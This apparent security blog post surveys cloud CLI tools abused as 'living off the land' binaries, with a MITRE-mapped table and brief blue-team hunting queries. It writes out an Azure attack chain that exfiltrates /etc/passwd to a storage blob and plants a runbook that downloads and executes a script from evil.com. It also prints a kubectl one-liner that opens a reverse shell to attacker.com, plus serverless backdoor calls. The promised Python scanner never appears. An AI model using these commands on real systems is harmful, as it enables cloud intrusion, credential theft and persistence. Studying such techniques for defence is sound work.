Build Your Own Cloud LOLBin Scanner: A Python Script for Detecting Risky CLI Commands
Cloud LOLBins: The Next Frontier of Living Off the Land
If Windows gave us
certutil, the cloud gave usaz,aws, andgcloud— pre-authenticated, pre-installed, and perfectly trusted.
Top 10 Cloud LOLBins (2025)
| Tool | Platform | Malicious Use | MITRE |
|---|---|---|---|
az (Azure CLI) | Azure | Exfil via az storage blob upload, run commands via az vm run-command | T1071, T1059 |
aws | AWS | S3 exfil, Lambda backdoor, SSM remote exec | T1567, T1059.006 |
gcloud | GCP | Secret Manager dump, GCE instance abuse | T1552 |
kubectl | Kubernetes | Pod exec, secret theft, port-forward | T1059.008 |
terraform | Multi-cloud | State file exfil, provider abuse | T1486 |
packer | CI/CD | Image backdoor injection | T1036 |
helm | K8s | Malicious chart deployment | T1525 |
doctl | DigitalOcean | Droplet snapshot exfil | T1567 |
oc (OpenShift CLI) | RHEL | Project enumeration, pod shell | T1087 |
gh (GitHub CLI) | GitHub Actions | Repo secrets dump | T1552.005 |
Real-World Attack Chain (Azure Example)
# 1. Attacker lands on compromised Azure VM (CLI pre-auth'd via Managed Identity)
whoami # azuread\system
# 2. Enumerate subscriptions
az account list --output table
# 3. Exfiltrate data via Storage Account (no egress firewall trigger)
az storage blob upload \
--account-name targetstorage \
--container-name loot \
--name db_backup.bak \
--file /etc/passwd \
--auth-mode login
# 4. Persistence via Automation Runbook
az automation runbook create \
--resource-group rg-prod \
--automation-account-name auto-prod \
--name backdoor \
--type PowerShell \
--content 'IWR http://evil.com/ps1 | IEX'Kubernetes kubectl LOLBin One-Liner
# Get shell in any pod — no kubectl binary needed if already in cluster
kubectl exec -it $(kubectl get pods -n default -o jsonpath="{.items[0].metadata.name}") -- sh -c "nc -e /bin/sh attacker.com 443"Defense & Hunting (Blue Team)
// Hunt az CLI exfil
DeviceProcessEvents
| where FileName == "az"
| where ProcessCommandLine contains "storage blob upload" or contains "run-command"# CloudTrail + Sigma: AWS CLI abuse
detection:
selection:
eventName: "RunCommand"
sourceIPAddress: "ec2-instance-ip"
condition: selection2025 Trend: LOLBins in Serverless
aws lambda invoke --payload file://payload.json backdoor.zipgcloud functions call backdoor --data '{"exec":"whoami"}'
Final Word
The cloud is the new OS. Its CLI tools are the new LOLBins.
Monitor command-line + identity + network context — not just file drops.
